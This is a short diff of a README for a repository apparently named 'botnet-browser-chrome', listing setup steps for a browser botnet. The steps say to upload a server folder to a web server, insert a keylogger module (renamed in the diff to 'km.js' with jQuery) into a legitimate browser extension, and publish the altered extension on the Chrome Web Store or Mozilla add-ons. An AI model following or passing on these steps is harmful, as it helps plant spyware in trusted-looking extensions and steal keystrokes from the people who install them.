hakanonymos/botnet-browser-chrome/README.md

 2) send folder named " server "   to your web server , test with wampserver or xhampp ......etc

-3) take a legitimate extension then add your keylogger module, if you have questions how does it work ask me in comment
+3) take a legitimate extension then add your "km.js","jquery-3.1.1", if you have questions how does it work ask me in comment

 4) publish your extension one chrome web store or adon mozilla